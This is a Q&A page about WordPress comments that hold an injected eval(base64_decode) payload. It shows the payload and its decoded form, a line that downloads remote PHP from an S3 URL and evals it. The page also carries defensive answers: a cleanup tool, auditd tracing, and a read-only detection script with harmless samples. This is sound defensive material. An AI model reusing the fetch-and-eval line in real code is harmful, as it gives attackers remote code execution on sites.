Eval Base64 virus Wordpress


Problem description

I'm using a WordPress blog. Today I got a comment like this:

<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->

When I decoded this comment using a decoder I got:

$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);

I'm getting many comments like this. Can anyone help me to resolve this problem? Is it a hack, or does it show the beginning of hacking?

Recommended answer

None of the suggestions worked for us. The following is how we removed malicious code from multiple WordPress sites without any downtime.

We ran into a problem where we had multiple legacy WordPress sites sharing one filesystem that was infiltrated by this virus.

We ended up writing a little Python script to traverse our filesystem and detect the malicious code.

Here's the code for anyone interested (NOTE: USE AT OWN RISK): https://github.com/michigan-com/eval_scrubber

pip install eval_scrubber
# finds all infected files, will not do anything but READ
python -m eval_scrubber find .
# attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .

That script will scan the filesystem for malicious content and, as a separate command, it will attempt to remove the base64 eval functions.

This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex to not match. We ended up using auditd to monitor what file was writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html

Once we found the generator of the virus, we did one more eval_scrubber remove, and then our problem was fixed.
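The two points above, decoding the base64 blob from the comment in the question and the answer's caveat that interleaved PHP comments defeat a plain regex, are illustrated by the following read-only scanner. It is an added example, not the eval_scrubber project's code or the answerer's script; the sample PHP sources and the base64 payload (harmless marker text) are constructed here. It compares a naive pattern with one that allows whitespace and /* */, // and # comments between every token, and decodes whatever it finds so the payload can be inspected before any file is touched.

```python
"""Find eval(base64_decode("...")) in PHP source and decode the payload for
inspection. Read-only: nothing is written or executed. Added example; not
the eval_scrubber tool referenced on the page."""
from __future__ import annotations

import base64
import binascii
import os
import re

# Anything PHP allows between tokens: whitespace, /* block */ comments,
# or // and # line comments. re.DOTALL lets block comments span lines.
_SEP = r"(?:\s|/\*.*?\*/|(?://|#)[^\n]*\n)*"

# Naive pattern: the literal token sequence a simple grep would look for.
NAIVE = re.compile(r"eval\(base64_decode\(")

# Tolerant pattern: the same token sequence with optional comments or
# whitespace between every token; group 2 captures the base64 literal.
TOLERANT = re.compile(
    "eval" + _SEP + r"\(" + _SEP + "base64_decode" + _SEP + r"\(" + _SEP
    + r"(['\"])([A-Za-z0-9+/=\s]+)\1" + _SEP + r"\)" + _SEP + r"\)",
    re.DOTALL,
)


def decode_blob(blob: str) -> str:
    """Decode a base64 literal (whitespace and missing padding tolerated)."""
    clean = re.sub(r"\s+", "", blob)
    clean += "=" * (-len(clean) % 4)
    try:
        return base64.b64decode(clean).decode("utf-8", errors="replace")
    except binascii.Error:
        return "<undecodable base64>"


def find_eval_base64(source: str) -> list[dict]:
    """Return one record per eval(base64_decode(...)) occurrence in source."""
    hits = []
    for m in TOLERANT.finditer(source):
        hits.append({
            "offset": m.start(),
            "line": source.count("\n", 0, m.start()) + 1,
            "matched": m.group(0),
            "decoded": decode_blob(m.group(2)),
        })
    return hits


def scan_tree(root: str, suffix: str = ".php") -> dict[str, list[dict]]:
    """Walk root, scan every *.php file and report hits; modifies nothing."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(suffix):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_eval_base64(fh.read())
            if hits:
                report[path] = hits
    return report


# Constructed samples (not from the page); the payload is harmless marker text.
_PAYLOAD = base64.b64encode(b"echo 'marker';").decode()
CLEAN_PHP = "<?php\necho 'hello';\n"
PLAIN_INFECTED = '<?php eval(base64_decode("' + _PAYLOAD + '")); ?>\n'
# The evasion the answer describes: PHP comments between every token.
COMMENTED_INFECTED = (
    "<?php\n"
    "eval/*a*/(/*b*/base64_decode//c\n"
    "(#d\n"
    "'" + _PAYLOAD + "'/*e*/)/*f*/); ?>\n"
)

if __name__ == "__main__":
    samples = [("clean", CLEAN_PHP), ("plain", PLAIN_INFECTED),
               ("commented", COMMENTED_INFECTED)]
    for name, src in samples:
        hits = find_eval_base64(src)
        print(f"{name}: naive={NAIVE.search(src) is not None} tolerant={len(hits)}")
        for h in hits:
            print(f"  line {h['line']}: decodes to {h['decoded']!r}")
```

Running the block shows the naive pattern catching only the plain sample while the tolerant one catches both infected samples and prints the decoded marker text; scan_tree(".") applies the same check to a real tree without modifying anything, which is the "find before remove" order the answer recommends.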
